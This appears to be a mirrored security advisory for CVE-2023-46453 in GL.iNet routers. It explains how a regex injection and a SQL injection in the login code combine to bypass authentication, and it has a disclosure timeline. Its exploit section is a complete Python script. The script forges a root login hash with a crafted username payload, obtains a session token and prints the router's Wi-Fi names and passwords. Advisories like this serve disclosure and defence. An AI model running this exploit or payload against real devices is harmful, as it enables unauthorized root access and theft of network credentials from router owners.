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## https://sploitus.com/exploit?id=PACKETSTORM:177485
DZONERZY Security Research  
  
GLiNet: Router Authentication Bypass  
  
========================================================================  
Contents  
========================================================================  
  
1. Overview  
2. Detailed Description  
3. Exploit  
4. Timeline  
  
========================================================================  
1. Overview  
========================================================================  
  
CVE-2023-46453 is a remote authentication bypass vulnerability in the web  
interface of GLiNet routers running firmware versions 4.x and up. The  
vulnerability allows an attacker to bypass authentication and gain access  
to the router's web interface.  
  
========================================================================  
2. Detailed Description  
========================================================================  
  
The vulnerability is caused by a lack of proper authentication checks in  
/usr/sbin/gl-ngx-session file. The file is responsible for authenticating  
users to the web interface. The authentication is in different stages.  
  
Stage 1:  
  
During the first stage the user send a request to the challenge rcp  
endpoint. The endpoint returns a random nonce value used later in the  
authentication process.  
  
Stage 2:  
  
During the second stage the user sends a request to the login rcp endpoint  
with the username and the encrypted password. The encrypted password is  
calculated by the following formula:  
  
md5(username + crypt(password) + nonce)  
  
The crypt function is the standard unix crypt function.  
  
The vulnerability lies in the fact that the username is not sanitized  
properly before being passed to the login_test function in the lua script.  
  
------------------------------------------------------------------------  
local function login_test(username, hash)  
if not username or username == "" then return false end  
  
for l in io.lines("/etc/shadow") do  
local pw = l:match('^' .. username .. ':([^:]+)')  
if pw then  
for nonce in pairs(nonces) do  
if utils.md5(table.concat({username, pw, nonce}, ":")) ==  
hash then  
nonces[nonce] = nil  
nonce_cnt = nonce_cnt - 1  
return true  
end  
end  
return false  
end  
end  
  
return false  
end  
------------------------------------------------------------------------  
  
This script check the username against the /etc/shadow file. If the username  
is found in the file the script will extract the password hash and compare  
it to the hash sent by the user. If the hashes match the user is  
authenticated.  
  
The issue is that the username is not sanitized properly before being  
concatenated with the regex. This allows an attacker to inject a regex into  
the username field and modify the final behavior of the regex.  
  
for instance, the following username will match the userid of the root user:  
  
root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)  
  
  
This will match the "root:" string and then any character until the next ":"  
character. This will cause the script skip the password and return the  
user id instead.  
  
Since the user id of the root user is always 0, the script will always  
return:  
  
md5("root:[^:]+:[^:]+" + "0" + nonce)  
  
Since this value is always the same, the attacker can simply send the known  
hash value to the login rcp endpoint and gain access to the web interface.  
  
Anyway this approach won't work as expected since later in the code inside  
the  
this check appear:  
  
------------------------------------------------------------------------  
local aclgroup = db.get_acl_by_username(username)  
  
local sid = utils.generate_id(32)  
  
sessions[sid] = {  
username = username,  
aclgroup = aclgroup,  
timeout = time_now() + session_timeout  
}  
------------------------------------------------------------------------  
  
The username which is now our custom regex will be passed to the  
get_acl_by_username  
function. This function will check the username against a database and  
return the aclgroup associated with the username.  
If the username is not found in the database the function will return nil,  
thus causing attack to fail.  
  
By checking the code we can see that the get_acl_by_username function is  
actually appending our raw string to a query and then executing it.  
This means that we can inject a sql query into the username field and  
make it return a valid aclgroup.  
  
------------------------------------------------------------------------  
M.get_acl_by_username = function(username)  
if username == "root" then return "root" end  
  
local db = sqlite3.open(DB)  
local sql = string.format("SELECT acl FROM account WHERE username =  
'%s'", username)  
  
local aclgroup = ""  
  
for a in db:rows(sql) do  
aclgroup = a[1]  
end  
  
db:close()  
  
return aclgroup  
end  
------------------------------------------------------------------------  
  
Using this payload we were able to craft a username which is both a valid  
regex and a valid sql query:  
  
roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+  
  
this will make the sql query become:  
  
SELECT acl FROM account WHERE username = 'roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+'  
  
which will return the aclgroup of the root user (root).  
  
========================================================================  
3. Exploit  
========================================================================  
  
------------------------------------------------------------------------  
# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass  
# Date: 18/10/2023  
# Exploit Author: Daniele 'dzonerzy' Linguaglossa  
# Vendor Homepage: https://www.gl-inet.com/  
# Vulnerable Devices:  
# GL.iNet GL-MT3000 (4.3.7)  
# GL.iNet GL-AR300M(4.3.7)  
# GL.iNet GL-B1300 (4.3.7)  
# GL.iNet GL-AX1800 (4.3.7)  
# GL.iNet GL-AR750S (4.3.7)  
# GL.iNet GL-MT2500 (4.3.7)  
# GL.iNet GL-AXT1800 (4.3.7)  
# GL.iNet GL-X3000 (4.3.7)  
# GL.iNet GL-SFT1200 (4.3.7)  
# And many more...  
# Version: 4.3.7  
# Firmware Release Date: 2023/09/13  
# CVE: CVE-2023-46453  
  
from urllib.parse import urlparse  
import requests  
import hashlib  
import random  
import sys  
  
  
def exploit(url):  
try:  
requests.packages.urllib3.disable_warnings()  
host = urlparse(url)  
url = f"{host.scheme}://{host.netloc}/rpc"  
print(f"[*] Target: {url}")  
print("[*] Retrieving nonce...")  
nonce = requests.post(url, verify=False, json={  
"jsonrpc": "2.0",  
"id": random.randint(1000, 9999),  
"method": "challenge",  
"params": {"username": "root"}  
}, timeout=5).json()  
if "result" in nonce and "nonce" in nonce["result"]:  
print(f"[*] Got nonce: {nonce['result']['nonce']} !")  
else:  
print("[!] Nonce not found, exiting... :(")  
sys.exit(1)  
print("[*] Retrieving authentication token for root...")  
md5_hash = hashlib.md5()  
md5_hash.update(  
f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())  
password = md5_hash.hexdigest()  
token = requests.post(url, verify=False, json={  
"jsonrpc": "2.0",  
"id": random.randint(1000, 9999),  
"method": "login",  
"params": {  
"username": f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+",  
"hash": password  
}  
}, timeout=5).json()  
if "result" in token and "sid" in token["result"]:  
print(f"[*] Got token: {token['result']['sid']} !")  
else:  
print("[!] Token not found, exiting... :(")  
sys.exit(1)  
print("[*] Checking if we are root...")  
check = requests.post(url, verify=False, json={  
"jsonrpc": "2.0",  
"id": random.randint(1000, 9999),  
"method": "call",  
"params": [token["result"]["sid"], "system", "get_status", {}]  
}, timeout=5).json()  
if "result" in check and "wifi" in check["result"]:  
print("[*] We are authenticated as root! :)")  
print("[*] Below some info:")  
for wifi in check["result"]["wifi"]:  
print(f"[*] --------------------")  
print(f"[*] SSID: {wifi['ssid']}")  
print(f"[*] Password: {wifi['passwd']}")  
print(f"[*] Band: {wifi['band']}")  
print(f"[*] --------------------")  
else:  
print("[!] Something went wrong, exiting... :(")  
sys.exit(1)  
except requests.exceptions.Timeout:  
print("[!] Timeout error, exiting... :(")  
sys.exit(1)  
except KeyboardInterrupt:  
print(f"[!] Something went wrong: {e}")  
  
  
if __name__ == "__main__":  
print("GL.iNet Auth Bypass\n")  
if len(sys.argv) < 2:  
print(  
f"Usage: python3 {sys.argv[1]} https://target.com",  
file=sys.stderr)  
sys.exit(0)  
else:  
exploit(sys.argv[1])  
------------------------------------------------------------------------  
  
========================================================================  
4. Timeline  
========================================================================  
  
2023/09/13 - Vulnerability discovered  
2023/09/14 - CVE-2023-46453 requested  
2023/09/20 - Vendor contacted  
2023/09/20 - Vendor replied  
2023/09/30 - CVE-2023-46453 assigned  
2023/11/08 - Vulnerability patched and fix released